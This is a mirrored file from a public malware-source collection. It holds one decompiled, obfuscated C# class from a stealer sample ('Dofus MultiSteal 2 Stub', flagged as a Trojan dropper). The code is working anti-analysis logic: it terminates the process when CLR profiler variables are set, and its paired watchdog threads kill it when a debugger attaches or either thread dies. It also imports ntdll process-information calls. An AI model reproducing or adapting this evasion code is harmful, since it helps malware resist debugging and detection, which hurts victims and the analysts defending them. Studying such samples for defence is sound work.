mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 03:16:11 +00:00
78 lines
2.7 KiB
C#
78 lines
2.7 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: 隬쪩夝횸抖뾟㌌豜
|
|||
|
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: F8CCC811-F0AE-43F4-8180-670E2BBAD259
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auww-b56915160d2d8d725e2d54a5b16a636ea854d31f8fa85a3d1e207112b177ddb1.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Threading;
|
|||
|
|
|||
|
internal static class 隬쪩夝횸抖뾟\u330C豜
|
|||
|
{
|
|||
|
[DllImport("ntdll.dll", EntryPoint = "NtQueryInformationProcess", CallingConvention = CallingConvention.StdCall, SetLastError = true, PreserveSig = false)]
|
|||
|
private static extern int \u2530랂哩뎖槧ᔥ讐椎(
|
|||
|
IntPtr ProcessHandle,
|
|||
|
int ProcessInformationClass,
|
|||
|
byte[] ProcessInformation,
|
|||
|
uint ProcessInformationLength,
|
|||
|
out int ReturnLength);
|
|||
|
|
|||
|
[DllImport("ntdll.dll", EntryPoint = "NtSetInformationProcess", CallingConvention = CallingConvention.StdCall, SetLastError = true, PreserveSig = false)]
|
|||
|
private static extern uint 囃ᯔꊾ䙾쳹蜊퀽\uEE20(
|
|||
|
IntPtr ProcessHandle,
|
|||
|
int ProcessInformationClass,
|
|||
|
byte[] ProcessInformation,
|
|||
|
uint ProcessInformationLength);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "CloseHandle", PreserveSig = false)]
|
|||
|
private static extern bool 蟌߇長噇盏\uF89F\uEE35屛(IntPtr hObject);
|
|||
|
|
|||
|
public static void 䶏ﮑ圕ᖌ\u2730怴\uEF09ᬤ()
|
|||
|
{
|
|||
|
switch (Environment.GetEnvironmentVariable("COR_ENABLE_PROFILING"))
|
|||
|
{
|
|||
|
case null:
|
|||
|
switch (Environment.GetEnvironmentVariable("COR_PROFILER"))
|
|||
|
{
|
|||
|
case null:
|
|||
|
break;
|
|||
|
default:
|
|||
|
goto label_1;
|
|||
|
}
|
|||
|
break;
|
|||
|
default:
|
|||
|
label_1:
|
|||
|
Environment.FailFast("Profiler detected");
|
|||
|
break;
|
|||
|
}
|
|||
|
Thread parameter1 = new Thread(new ParameterizedThreadStart(隬쪩夝횸抖뾟\u330C豜.\uFD40쿑\uE258豅ﺿ\u2316\uE307\uFFFD));
|
|||
|
Thread parameter2 = new Thread(new ParameterizedThreadStart(隬쪩夝횸抖뾟\u330C豜.\uFD40쿑\uE258豅ﺿ\u2316\uE307\uFFFD));
|
|||
|
parameter1.IsBackground = true;
|
|||
|
parameter2.IsBackground = true;
|
|||
|
parameter1.Start((object) parameter2);
|
|||
|
Thread.Sleep(500);
|
|||
|
parameter2.Start((object) parameter1);
|
|||
|
}
|
|||
|
|
|||
|
private static void \uFD40쿑\uE258豅ﺿ\u2316\uE307\uFFFD(object thread)
|
|||
|
{
|
|||
|
Thread.Sleep(1000);
|
|||
|
Thread thread1 = (Thread) thread;
|
|||
|
while (true)
|
|||
|
{
|
|||
|
if (Debugger.IsAttached || Debugger.IsLogging())
|
|||
|
Environment.FailFast("Debugger detected (Managed)");
|
|||
|
if (!thread1.IsAlive)
|
|||
|
goto label_4;
|
|||
|
label_2:
|
|||
|
Thread.Sleep(1000);
|
|||
|
continue;
|
|||
|
label_4:
|
|||
|
Environment.FailFast("Loop broken");
|
|||
|
goto label_2;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|